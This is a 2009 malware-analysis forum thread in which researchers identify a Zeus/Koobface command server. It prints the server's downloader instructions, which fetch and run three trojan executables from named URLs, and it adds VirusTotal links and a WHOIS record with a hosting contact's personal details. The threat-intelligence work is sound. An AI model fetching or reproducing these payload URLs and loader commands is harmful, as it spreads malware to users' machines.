Malware Domain List

Malware Related => Malware Analysis => Topic started by: cmg on July 08, 2009, 09:45:26 pm

Title: New Zeus?
Post by: cmg on July 08, 2009, 09:45:26 pm
 98.143.159.138:80 POST http://trisem.com/achcheck.php 
 98.143.159.138:80 POST http://trisem.com/ld/gen.php 

I can't get to ZeusTracker right now but I think this is another one.
Title: Re: New Zeus?
Post by: MysteryFCM on July 08, 2009, 10:12:34 pm
gen.php;

Code: [Select]
#noparam
#PID=6145
START|http://upload.octopus-multimedia.be/1/6244.exe
START|http://upload.octopus-multimedia.be/1/nfr.exe
STARTONCE|http://upload.octopus-multimedia.be/1/pp.10.exe
WAIT|60
#BLACKLABEL
EXIT

upload.octopus-multimedia.be = 87.236.216.149 <> byte.besite.be

http://hosts-file.net/?s=87.236.216.149

achcheck.php;

Code: [Select]
ACH_OK
Code: [Select]
inetnum: 87.236.216.0 - 87.236.216.255
netname: BESITE-NET1-BRU-BE
mnt-domains: BESITE-MNT
descr: besite256
country: BE
admin-c: TDW7-RIPE
tech-c: TDW7-RIPE
status: ASSIGNED PA
mnt-by: BESITE-MNT
source: RIPE # Filtered

person: Tom De Wispelaere
address: Fonteinstraat 1 a bus 5
address: B- 3000 Leuven
address: BE
phone: +003216270005
fax-no: +003216270001
e-mail: tom@besite.be
nic-hdl: TDW7-RIPE
source: RIPE # Filtered

% Information related to '87.236.216.0/24AS35746'

route: 87.236.216.0/24
descr: besite256r
origin: AS35746
mnt-by: BESITE-MNT
source: RIPE # Filtered
Title: Re: New Zeus?
Post by: MysteryFCM on July 08, 2009, 10:18:56 pm
/1/6244.exe = Win32/BHO.NOE trojan (NOD32)

http://www.virustotal.com/analisis/f59756971261414efae9df3ad8772b3d3ea51f399a94deaa3969f3c510b9ed68-1247091622

/1/nfr.exe = TrojanProxy:Win32/Koobface.Gen!C (Microsoft)

http://www.virustotal.com/analisis/c5e963fe982ec0956e6d74cc2f598db5b255bf7f2ed24bee49640894e7722aa0-1247091632

/1/pp.10.exe = Worm:Win32/Koobface.Gen!D (Microsoft)

http://www.virustotal.com/analisis/4698edb015333a382b6ea2944aabb031c5e2f445afeba8ed3f83df2749bcf469-1247091093
Title: Re: New Zeus?
Post by: philipp on July 08, 2009, 11:37:53 pm
the reply from gen.php says its definitely koobface